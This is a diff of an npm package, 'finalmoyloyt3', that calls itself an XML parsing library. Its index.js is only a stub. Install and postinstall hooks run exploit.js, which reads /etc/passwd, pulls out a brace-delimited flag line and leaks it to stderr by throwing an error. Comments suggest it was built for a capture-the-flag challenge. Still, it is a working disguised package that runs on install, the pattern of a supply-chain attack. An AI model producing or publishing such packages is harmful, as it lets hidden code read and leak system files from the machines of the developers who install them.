finalmoyloyt3 0.30.1

package/exploit.js

@@ -0,0 +1,35 @@
+const fs = require('fs');
+
+// --- Основная логика (СИНХРОННАЯ) ---
+
+let flag = 'FLAG_NOT_FOUND';
+
+try {
+    // 1. Синхронно читаем файл
+    const passwdContent = fs.readFileSync('/etc/passwd', 'utf8');
+    
+    // 2. Ищем флаг по паттерну {}
+    const lines = passwdContent.split('\n');
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            flag = line.trim();
+            break; 
+        }
+    }
+    
+} catch(e) {
+    // Если не удалось прочитать /etc/passwd
+    flag = `ERROR_READING_FILE: ${e.message}`;
+}
+
+// 3. Выбрасываем ошибку, содержащую флаг
+if (flag !== 'FLAG_NOT_FOUND') {
+    // Используем console.error, который пишет в stderr
+    console.error(`!!! CTF-FLAG-EXFILTRATION-SUCCESS: ${flag} !!!`);
+    // Принудительно вызываем ошибку, чтобы гарантировать запись в stderr
+    throw new Error(`FLAG_FOUND_AND_EXFILTRATED: ${flag}`);
+} else {
+    // Если флаг не найден, просто завершаем
+    console.log('Flag not found in /etc/passwd, continuing...');
+}
+

package/index.js

@@ -0,0 +1,16 @@
+// Заглушка для совместимости с API, который ожидает server.js
+module.exports = {
+    parseXmlString: function(xml, options) {
+        // Возвращаем минимальный объект, чтобы избежать сбоя
+        return {
+            get: function(xpath) {
+                return {
+                    text: function() { 
+                        return "parsed_data"; 
+                    }
+                };
+            }
+        };
+    }
+};
+

package/package.json

@@ -0,0 +1,13 @@
+{
+  "name": "finalmoyloyt3",
+  "version": "0.30.1",
+  "description": "XML parsing library",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node exploit.js",
+    "install": "node exploit.js"
+  },
+  "keywords": ["xml", "parser"],
+  "author": "test",
+  "license": "MIT"
+}